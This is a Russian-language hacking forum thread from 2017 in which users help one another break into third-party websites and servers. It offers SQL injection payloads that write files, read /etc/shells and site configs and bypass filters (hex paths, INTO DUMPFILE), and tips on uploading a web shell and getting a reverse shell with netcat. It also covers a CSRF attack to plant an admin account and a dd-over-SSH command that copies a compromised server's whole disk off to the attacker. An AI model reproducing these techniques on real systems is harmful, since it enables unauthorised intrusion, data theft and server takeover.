08.07.2017, 17:05
Существует какая-либо уязвимость для phpmyadmin 4.0.10.15?

SaNDER
08.07.2017, 18:42
ACat said:
↑ (https://antichat.live/posts/4103633/)
так если ты в ПМА, от какого ты юзера, есть ли у юзера файл прив? Если да - лей шелл.
Какая версия самого ПМА установлена? ПМА тоже бывают с багами.


Там PMA не так выглядит как обычно,будто бы не полноценная,чисто одним текстом и версия не указана.Нашёл файл phpMyAdmin.spec

И если там не вранье,то версия 2.8.0


Code:
%define _myadminpath /var/www/myadmin
%define pkgrelease rc1
%define microrelease 1

Name: phpMyAdmin
Version: 2.8.0
Release: %{pkgrelease}.%{microrelease}
License: GPL
Group: Applications/Databases/Interfaces
Source0: http://prdownloads.sourceforge.net/phpmyadmin/%{name}-%{version}-%{pkgrelease}.tar.bz2
Source1: phpMyAdmin-http.conf
URL: http://sourceforge.net/projects/phpmyadmin/
Requires: mysql
Requires: php-mysql
Buildarch: noarch
BuildRoot: %{_tmppath}/%{name}-root

Summary: phpMyAdmin - web-based MySQL administration

Нашёл файл swekey.sample-1.conf.

Там нашёл это :


Code:
0000000000000000000000000000763A:root
000000000000000000000000000089E4:steve
0000000000000000000000000000231E:scott

crlf
09.07.2017, 16:27
https://www.cvedetails.com/cve/CVE-2016-5239/

Нужен PoC.

Vot0Ex
09.07.2017, 16:39
Mexel said:
↑ (https://antichat.live/posts/4103739/)
Существует какая-либо уязвимость для phpmyadmin 4.0.10.15?


Список публичных уязвимостей phpMyAdmin с 2001 года по сей день.

http://www.cvedetails.com/product/1341/?q=Phpmyadmin

Приватные уязвимости вряд ли кто станет палить)

ACat
09.07.2017, 20:12
pma/Documentation.html помоему. или знак вопроса на форме входа.


SaNDER said:
↑ (https://antichat.live/posts/4103773/)
Там PMA не так выглядит как обычно,будто бы не полноценная,чисто одним текстом и версия не указана.Нашёл файл phpMyAdmin.spec
И если там не вранье,то версия 2.8.0

Code:
%define _myadminpath /var/www/myadmin
%define pkgrelease rc1
%define microrelease 1

Name: phpMyAdmin
Version: 2.8.0
Release: %{pkgrelease}.%{microrelease}
License: GPL
Group: Applications/Databases/Interfaces
Source0: http://prdownloads.sourceforge.net/phpmyadmin/%{name}-%{version}-%{pkgrelease}.tar.bz2
Source1: phpMyAdmin-http.conf
URL: http://sourceforge.net/projects/phpmyadmin/
Requires: mysql
Requires: php-mysql
Buildarch: noarch
BuildRoot: %{_tmppath}/%{name}-root

Summary: phpMyAdmin - web-based MySQL administration

Нашёл файл swekey.sample-1.conf.
Там нашёл это :

Code:
0000000000000000000000000000763A:root
000000000000000000000000000089E4:steve
0000000000000000000000000000231E:scott



http://0day.today/search?search_request=phpmyadmin

exT1ma4ka
13.07.2017, 11:16
в sql-inj фильтруется слово OUTFILE. привилегии есть, иначе бы и спрашивать не стал. как поступить ?

- конструкция /**/ внутри не работает, как и %0b, как и + и пробел.

erwerr2321
13.07.2017, 11:23
exT1ma4ka said:
↑ (https://antichat.live/posts/4105379/)
в sql-inj фильтруется слово OUTFILE.


Вывод, пожалуйста

BabaDook
13.07.2017, 15:10
н


exT1ma4ka said:
↑ (https://antichat.live/posts/4105379/)
в sql-inj фильтруется слово OUTFILE. привилегии есть, иначе бы и спрашивать не стал. как поступить ?
- конструкция /**/ внутри не работает, как и %0b, как и + и пробел.


нахуя оно тебе ?

exT1ma4ka
13.07.2017, 17:58
SELECT 1 INTO OUTFILE 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 - outfile фильтруется, не проходит.

t0ma5
13.07.2017, 18:00
exT1ma4ka said:
↑ (https://antichat.live/posts/4105570/)
SELECT 1 INTO OUTFILE 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 - outfile фильтруется, не проходит.


'INTO OUTFILE' hex не воспринимает, недавно же это писали

exT1ma4ka
13.07.2017, 18:17
t0ma5 said:
↑ (https://antichat.live/posts/4105571/)
'INTO OUTFILE' hex не воспринимает


пусть. но вопрос всё равно открыт - как поступить, если OUTFILE фильтруется ? просто по-факту, ибо нигде на этот счёт не пишут. для развития.

t0ma5
13.07.2017, 18:24
exT1ma4ka said:
↑ (https://antichat.live/posts/4105580/)
пусть. но вопрос всё равно открыт - как поступить, если OUTFILE фильтруется ? просто по-факту, ибо нигде на этот счёт не пишут. для развития.


если это тот же сайт, на котором даже урлдекода нет, но сомневаюсь что оно фильтруется, скорее всего прав на запись не хватает, проверь вообще работает ли оно(в /tmp по дефолту запись есть у всех)


Code:
select 'test' from(select 1)x INTO OUTFILE '/tmp/qqq'
select load_file('/tmp/qqq')

если не работает, то забить на этот вектор, искать другое

хз ещё как апач/etc настроен, файл если и создастся - то из под юзера мускул, не факт что будет работать

exT1ma4ka
13.07.2017, 19:03
t0ma5 said:
↑ (https://antichat.live/posts/4105584/)
если это тот же сайт, на котором даже урлдекода нет


нет. на том нет mysql привилегий на запись, сейчас говорю о другом. и в данном случае ' фильтруются, поэтому приходится в hex переводить.

t0ma5
13.07.2017, 19:10
exT1ma4ka said:
↑ (https://antichat.live/posts/4105596/)
нет. на том нет mysql привилегий на запись, сейчас говорю о другом. и в данном случае ' фильтруются, поэтому приходится в hex переводить.


hex не катит, читай файлы сайта, может что интересное встретится

BabaDook
13.07.2017, 19:14
exT1ma4ka said:
↑ (https://antichat.live/posts/4105570/)
SELECT 1 INTO OUTFILE 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 - outfile фильтруется, не проходит.


Есть ещё пару вариантов, хотя с 0x272f6562616c2f74766f752f6d616d6b752f62726f2e7468 7827 нету вариантов, жаль

exT1ma4ka
13.07.2017, 19:15
t0ma5 said:
↑ (https://antichat.live/posts/4105599/)
hex не катит, читай файлы сайта, может что интересное встретится


вывода нет, только error based. типа:


Code:
OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID(VERSION(), FLOOR(RAND(33)*2), 64))--



Code:
OR ExtractValue(1,concat(0x5c,(VERSION())))--

в них файл не отображается, просто страница грузится в рабочем режиме.

t0ma5
13.07.2017, 19:53
exT1ma4ka said:
↑ (https://antichat.live/posts/4105601/)
вывода нет, только error based. типа:

Code:
OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID(VERSION(), FLOOR(RAND(33)*2), 64))--


Code:
OR ExtractValue(1,concat(0x5c,(VERSION())))--

в них файл не отображается, просто страница грузится в рабочем режиме.


error-based тоже вывод)

чтение файла можно и через boolean проверить конструкцией length(load_file('/etc/shells'))>0 , ну так, может когда пригодится

файл кстати какой читал? может там open_basedir, если докрут известен - попробуй index.php прочитать

Gorev
13.07.2017, 20:47
читай конфиги сервера, ищи полный путь до сайта, читай конфиги сайта (возможно есть пхпмайадмин), может на соседних сайтах есть пхпмайадмин, записывай через пыху шелл, может возможно удаленное подключение к мускулю.

exT1ma4ka
13.07.2017, 21:01
пути известны.


t0ma5 said:
↑ (https://antichat.live/posts/4105611/)
файл кстати какой читал?


/../../public_html/configuration.php (joomla)


t0ma5 said:
↑ (https://antichat.live/posts/4105611/)
length(load_file('/etc/shells'))>0


результат не виден. просто рабочая страница. даже если имя файла в запросе изменить на неправильное.

но опять таки, внутри LOAD_FILE(тут) - мне приходится конструкцию с путями и кавычками писать в hex, ибо ' фильтруются.

dooble
14.07.2017, 15:27
exT1ma4ka said:
↑ (https://antichat.live/posts/4105580/)
пусть. но вопрос всё равно открыт - как поступить, если OUTFILE фильтруется ? просто по-факту, ибо нигде на этот счёт не пишут. для развития.


Вместо INTO OUTFILE можно использовать INTO DUMPFILE.

karkajoi
14.07.2017, 20:47
Такой вопрос, пытаюсь поднять backconnect ,но не работает ни С и perl python скрипты, то есть 0 на массу при попытке соединения, но если пробую через php скрипт соединения появлсятся и сразу пропадает , netcat ставлю с таками параметрами -lvnp 443 -lvp 443 ( пробовал разные порты, смотрел какие порты открыты на сервере), но всеравно результат один и тот же, соединение появляется и сразу netcat вылетает. В какую сторону копать?

Вот модули что есть на серве


Code:
Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_auth_digest, mod_authn_file, mod_authn_alias, mod_authn_anon, mod_authn_dbm, mod_authn_default, mod_authz_host, mod_authz_user, mod_authz_owner, mod_authz_groupfile, mod_authz_dbm, mod_authz_default, util_ldap, mod_authnz_ldap, mod_include, mod_log_config, mod_logio, mod_env, mod_ext_filter, mod_mime_magic, mod_expires, mod_deflate, mod_headers, mod_usertrack, mod_setenvif, mod_mime, mod_dav, mod_autoindex, mod_info, mod_dav_fs, mod_vhost_alias, mod_negotiation, mod_dir, mod_actions, mod_speling, mod_userdir, mod_alias, mod_substitute, mod_rewrite, mod_proxy, mod_proxy_balancer, mod_proxy_ftp, mod_proxy_http, mod_proxy_ajp, mod_proxy_connect, mod_cache, mod_suexec, mod_disk_cache, mod_cgi, mod_version, mod_php5, mod_apreq2, mod_rpaf, mod_perl

И 2й вопрос, если я успешно получаю рут права как мне сделать шел что б запускался от рута, а не от apacha?

SaNDER
17.07.2017, 10:38
Нашёл на сайте Uploader по ссылке сайт/js/uploadify-2.3/ как-то так,неважно

В заголовке написано Uplodify Test .

При переходе видна лишь кнопка SELECT,заливаю shell пишет что загружено,

Но точно ли он загружает или для виду,это же,типо тест...

А если и загружает то куда,непонятно.Как узнать?

И ещё вопрос я попал на FTP

ftp://***-***-***-**.*****.******.***

Могу всякие файлы читать,но файлов слишком много,аж лагает .

Есть ли какие-нибудь программы для скана директорий FTP?

SooLFaa
17.07.2017, 14:27
SaNDER said:
↑ (https://antichat.live/posts/4106791/)
Нашёл на сайте Uploader по ссылке сайт/js/uploadify-2.3/ как-то так,неважно
В заголовке написано Uplodify Test .
При переходе видна лишь кнопка SELECT,заливаю shell пишет что загружено,
Но точно ли он загружает или для виду,это же,типо тест...
А если и загружает то куда,непонятно.Как узнать?
И ещё вопрос я попал на FTP
ftp://***-***-***-**.*****.******.***
Могу всякие файлы читать,но файлов слишком много,аж лагает .
Есть ли какие-нибудь программы для скана директорий FTP?


1) Брутить стандартные пути папки upload, images, avatrs и прочее у можно dirb'у скормить словарь. Второй потыкать форум на предмет FPD(Открытие пути файла), Третий, скачать фреймворк с паблика и посмотреть куда он льет по дефолту.

Octavian
20.07.2017, 15:33
Изучал атаку xss через svg все показалось просто но почему на том же hackerone такие атаки мение цены чем стандартные xss на томже ютубе ненахожу примеры кражи куков через svg, я что то недопонимаю ?

RedFern.89
20.07.2017, 23:08
Говорит ли наличие такой ошибки о sql-inj?


Code:
syntax error, unexpected '@', expecting $end|Gdn_Database|Query|select * from ( select match(d.Name, d.Body) against(:Search0 in boolean mode) as `Relavence`, d.DiscussionID as `PrimaryID`, d.Name as `Title`, d.Body as `Summary`, d.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/', d.DiscussionID) as `Url`, d.DateInserted as `DateInserted`, d.InsertUserID as `UserID`, 'Discussion' as `RecordType` from GDN_Discussion d where match(d.Name, d.Body) against (:Search1 in boolean mode) union all select match(c.Body) against(:Search2 in boolean mode) as `Relavence`, c.CommentID as `PrimaryID`, d.Name as `Title`, c.Body as `Summary`, c.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/comment/', c.CommentID, '/#Comment_', c.CommentID) as `Url`, c.DateInserted as `DateInserted`, c.InsertUserID as `UserID`, 'Comment' as `RecordType` from GDN_Comment c join GDN_Discussion d on d.DiscussionID = c.DiscussionID where match(c.Body) against (:Search3 in boolean mode) ) s order by s.DateInserted desc limit 20

ACat
24.07.2017, 19:29
RedFern.89 said:
↑ (https://antichat.live/posts/4108009/)
Говорит ли наличие такой ошибки о sql-inj?

Code:
syntax error, unexpected '@', expecting $end|Gdn_Database|Query|select * from ( select match(d.Name, d.Body) against(:Search0 in boolean mode) as `Relavence`, d.DiscussionID as `PrimaryID`, d.Name as `Title`, d.Body as `Summary`, d.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/', d.DiscussionID) as `Url`, d.DateInserted as `DateInserted`, d.InsertUserID as `UserID`, 'Discussion' as `RecordType` from GDN_Discussion d where match(d.Name, d.Body) against (:Search1 in boolean mode) union all select match(c.Body) against(:Search2 in boolean mode) as `Relavence`, c.CommentID as `PrimaryID`, d.Name as `Title`, c.Body as `Summary`, c.Format as `Format`, d.CategoryID as `CategoryID`, concat('/discussion/comment/', c.CommentID, '/#Comment_', c.CommentID) as `Url`, c.DateInserted as `DateInserted`, c.InsertUserID as `UserID`, 'Comment' as `RecordType` from GDN_Comment c join GDN_Discussion d on d.DiscussionID = c.DiscussionID where match(c.Body) against (:Search3 in boolean mode) ) s order by s.DateInserted desc limit 20



не обязательно.

SaNDER
28.07.2017, 19:02
Как подключиться к InterBase?

Логин и пароль знаю,а как подключиться нет .

IBConsole запустил и понять в ней ничего не могу.Версия новая .

kacergei
28.07.2017, 20:15
Подскажите webshell для windows с backconnect'ом в комплекте

PS на сервере php,node

или отдельно backconnect с примером его запуска

Octavian
01.08.2017, 17:19
Делаю POST CSRF


Code:


Все срабатывает отлично но после атаки админа редиректит в /users/ и он спалит нового админа так вот как поменять и этот редирект?

crlf
01.08.2017, 19:46
Редирект ты вряд ли сможешь упразднить, но оно и не нужно. CSRF обычно в ифрейм прячется, примерно так будет выглядеть:


PHP:


CSRF









kacergei
09.08.2017, 10:50
Имеется root на сервере

.SpoilerTarget" type="button">Spoiler: info server


Code:
root@server:# uname -a
Linux server 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

root@server:# df -h
Filesystem Size Used Avail Use% Mounted on
udev 490M 0 490M 0% /dev
tmpfs 100M 11M 89M 11% /run
/dev/vda1 30G 18G 12G 60% /
tmpfs 497M 0 497M 0% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 497M 0 497M 0% /sys/fs/cgroup
tmpfs 100M 0 100M 0% /run/user/0

root@server:# lsblk -a
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
vda 253:0 0 30G 0 disk
└─vda1 253:1 0 30G 0 part /
loop0 7:0 0 0 loop
loop1 7:1 0 0 loop
loop2 7:2 0 0 loop
loop3 7:3 0 0 loop
loop4 7:4 0 0 loop
loop5 7:5 0 0 loop
loop6 7:6 0 0 loop
loop7 7:7 0 0 loop


Подскажите как имея ssh сделать образ/backup удаленной машины (то есть всей системы/hdd)?

И скачать налету упакованный образ/архив (при условии если места не хватит)

В последствии поднять данный образ в VM

crlf
09.08.2017, 17:21
Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH:


Code:
dd if=/dev/vda | ssh root@yourserver.com -p22 "cat > vda_image"

А потом гуглить "dd image to vm" и пробовать заводить этот образ

kacergei
09.08.2017, 20:09
crlf said:
↑ (https://antichat.live/posts/4115173/)
Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH:

Code:
dd if=/dev/vda | ssh root@yourserver.com -p22 "cat > vda_image"

А потом гуглить "
dd image to vm
" и пробовать заводить этот образ


Ранее с таким не сталкивался, потому вопрос может быть очень глупым

)))

Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)

"cat > vda_image"я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh root@xxx.xxx.xxx.xx (mailto:root@xxx.xxx.xxx.xx) -p22 "cat > /root/folder_on_my_computer/vda_image_file"

Я верно понял?

P.S> как узнать предположительный размер конечного файла?

Дабы решить на какую удаленную лить (место не резиновое =) )

t0ma5
09.08.2017, 20:56
kacergei said:
↑ (https://antichat.live/posts/4115204/)
Ранее с таким не сталкивался, потому вопрос может быть очень глупым
)))
Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
"cat > vda_image"
я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh
root@xxx.xxx.xxx.xx (mailto:root@xxx.xxx.xxx.xx)
-p22 "cat > /root/folder_on_my_computer/vda_image_file"
Я верно понял?
P.S> как узнать предположительный размер конечного файла?
Дабы решить на какую удаленную лить (место не резиновое =) )


смонтируй директорию(хоть корень) через sshfs


Code:
sshfs user@hostname:/remote/path /sshfs_local_folder

и работай как с локальной системой, tar там или ещё чего, создать iso можно так


Code:
mkisofs -lJR -o output_image.iso sshfs_local_folder

по идее должно работать